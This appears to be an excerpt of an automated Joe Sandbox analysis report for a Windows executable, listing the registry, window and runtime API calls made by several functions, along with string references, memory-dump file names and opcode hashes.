_memset.LIBCMT ref: 00410A19
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 00410A42
GetWindowLongW.USER32(?,000000FC), ref: 00410A54
GetWindowLongW.USER32(?,000000FC), ref: 00410A65
SetWindowLongW.USER32(?,000000FC,?), ref: 00410A81

Strings

,, xrefs: 00410A38

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 8d60fd299e20b7f10b88383e9fa6373a26d9161b89e9fa6b87cf18d013a8533b
Instruction ID: 4f1825a191637749bfb3d6768be5974821d46af6f9ed4afb3fcf175ed0728af2
Opcode Fuzzy Hash: 8d60fd299e20b7f10b88383e9fa6373a26d9161b89e9fa6b87cf18d013a8533b
Instruction Fuzzy Hash: 203116706003109FDB20AF75D894AAFBBF4BF48314F04052EE54597792EBB8E880CB99

Function 00416B07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00416B11
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00416BF7
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00416C14
RegCloseKey.ADVAPI32(?), ref: 00416C34
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 00416C4F

Strings

Software\, xrefs: 00416B75

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 66550f330b647a08b864c3109ec4a4dbdd72f1ff1faed3a367571fa2e5de9f8a
Instruction ID: 36641cc5510fa41ef83f43964312eac4dbeb48242a54182718a4096cef0d769d
Opcode Fuzzy Hash: 66550f330b647a08b864c3109ec4a4dbdd72f1ff1faed3a367571fa2e5de9f8a
Instruction Fuzzy Hash: DA417931901128ABCB21EBA5DC89ADEB7BDAF48314F1005DAF105E6291DB78DFC48F59

Function 004290E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00429101

Part of subcall function 00428848: __getptd.LIBCMT ref: 0042885B

Part of subcall function 0042BE5E: __getptd_noexit.LIBCMT ref: 0042BE5E

Part of subcall function 0042F401: __decode_pointer.LIBCMT ref: 0042F40C

___ascii_strnicmp.LIBCMT ref: 00429181
__tolower_l.LIBCMT ref: 004291A2
__tolower_l.LIBCMT ref: 004291B4

Strings

N-, xrefs: 0042910B, 0042913E
b, xrefs: 0042911B

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__decode_pointer__getptd__getptd_noexit
String ID: N-$b
API String ID: 101347385-3739427997
Opcode ID: eb002d190f9aed0161ad372a66206e1fbaf0260889b96394962c64714eedec52
Instruction ID: a66a1daff084b41fbc18575b70a6c52e1366c931067bc37d7ff4e65be414c1fa
Opcode Fuzzy Hash: eb002d190f9aed0161ad372a66206e1fbaf0260889b96394962c64714eedec52
Instruction Fuzzy Hash: BD21F872A0026AABDF21AF6ADC455BF7774BF00320F98066FF86057285E7358D218765

Function 00416989 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00416993
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00416A21
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00416A44

Part of subcall function 00416934: __EH_prolog3.LIBCMT ref: 0041693B
Part of subcall function 00416934: _DebugHeapAllocator.LIBCPMTD ref: 00416952

Strings

Software\Classes\, xrefs: 004169D4

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugEnumH_prolog3H_prolog3_catch_HeapOpen
String ID: Software\Classes\
API String ID: 751309350-1121929649
Opcode ID: 8ba6e2bfa18d7669343961440b5a7af3dfcb1fed08941104137eff0487d14e43
Instruction ID: 72a0d3e39931d1f78df83222088e72540b9ccd8fb415e73d1ffaef3579753509
Opcode Fuzzy Hash: 8ba6e2bfa18d7669343961440b5a7af3dfcb1fed08941104137eff0487d14e43
Instruction Fuzzy Hash: 94317231801028ABCB21EBE4DC58BDDB7B8AF08354F1541EAE95973291DB788FC49F65

Function 00445090 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004450EB
SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000711), ref: 00445112
_DebugHeapAllocator.LIBCPMTD ref: 00445152
Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 00445161

Strings

SD, xrefs: 00445109
SD, xrefs: 004450B2, 0044518A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreationTask$AllocatorCallstackCallstack::_Concurrency::details::_DebugFileHeapInfo_memset
String ID: SD$SD
API String ID: 3929418788-746068739
Opcode ID: 2b1a608d1d0ba7b94565ca115eaa8d3d55189860efad87072deb3a6ecb073f18
Instruction ID: 6b735d832de1975ad97c6bc7a113e57132530289240824a04fd1b6d1b4a12378
Opcode Fuzzy Hash: 2b1a608d1d0ba7b94565ca115eaa8d3d55189860efad87072deb3a6ecb073f18
Instruction Fuzzy Hash: 90215C709012189BDB14EF55DC99B9EB7B4FB04704F5041ABE41A772C1EB746E44CF94

Function 004151E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00415218
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0041523B
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00415257
RegCloseKey.ADVAPI32(?), ref: 00415267
RegCloseKey.ADVAPI32(?), ref: 00415271

Strings

software, xrefs: 00415200

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 2690113035a2470b2af3f2463cc2c72b9283b660ac6a72c7942b357dd0816403
Instruction ID: 7e2cbcb616161378e7591d1ed146bf1493b18f2c82097ffb03d1d5a686f17098
Opcode Fuzzy Hash: 2690113035a2470b2af3f2463cc2c72b9283b660ac6a72c7942b357dd0816403
Instruction Fuzzy Hash: 7C11B376D00158FB8B21DB9ADC88DDFBFBDEBC9710B1040AAE504A2121E7759A44DBA4

Function 0044E210 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0044E224
SetLastError.KERNEL32(00000100), ref: 0044E236
_memset.LIBCMT ref: 0044E249
swprintf.LIBCMT ref: 0044E260
